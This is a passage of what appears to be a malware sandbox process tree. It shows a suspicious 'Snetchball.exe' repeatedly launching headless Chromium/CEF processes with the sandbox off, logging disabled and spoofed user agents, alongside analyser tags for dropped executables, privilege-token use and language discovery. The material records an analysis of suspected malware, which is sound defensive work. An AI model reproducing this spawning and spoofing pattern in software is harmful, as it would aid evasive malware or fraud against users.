C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:124⤵PID:2800
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
- Drops file in Windows directory
- Modifies Control Panel
PID:7000 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2812 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:226⤵
- System Location Discovery: System Language Discovery
PID:4872
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:826⤵PID:4908
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3132 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:826⤵PID:3320
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3152 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:126⤵PID:2136
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=2816,i,1498905386811001148,6325913936665718805,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:126⤵PID:1916
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
- System Location Discovery: System Language Discovery
PID:7036
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
- System Location Discovery: System Language Discovery
PID:7084
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵PID:7124
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵PID:5856
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
- System Location Discovery: System Language Discovery
PID:484
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵PID:3136
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵PID:5896
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵PID:5144
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵PID:5384
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵PID:5964
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1952 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:122⤵
- System Location Discovery: System Language Discovery
PID:3992
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
- System Location Discovery: System Language Discovery
PID:2676
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵PID:6100
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵PID:4544
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵PID:5896
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵PID:3284
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
- System Location Discovery: System Language Discovery
PID:5344
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵PID:1012
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵PID:5668
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
- System Location Discovery: System Language Discovery
PID:4244
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵PID:3344
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3960 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:5328
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3896 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:3384
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1196 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:1912
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3888 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵PID:4532
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:5176
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:5288
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:5964
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:6080
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:3536
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
- System Location Discovery: System Language Discovery
PID:1672
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
- System Location Discovery: System Language Discovery
PID:5064
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:2568
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:2684
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:5656
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵PID:5216
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4308 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
- System Location Discovery: System Language Discovery
PID:5596
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
- System Location Discovery: System Language Discovery
PID:2684
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
- System Location Discovery: System Language Discovery
PID:4652
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:5472
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:928
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:1252
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:4980
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:5576
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- System Location Discovery: System Language Discovery
PID:5924
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:3080
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2484 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
- System Location Discovery: System Language Discovery
PID:3568
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3972 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:4792
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3588 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:1672
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1944 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:388
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=2608 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:6012
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4104 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:5396
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3588 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:5196
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵PID:2848
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵PID:4888
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- System Location Discovery: System Language Discovery
PID:5524
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵PID:3428
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵PID:5280
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:3424
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:2728
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2244
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5816
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:5424
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:3828
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:924
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:2940
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:5196
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:4844
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:6116
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:6056
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:1892
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:408
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3164 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3972 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5472
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exeC:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exe4⤵
- Executes dropped EXE
PID:1368 -
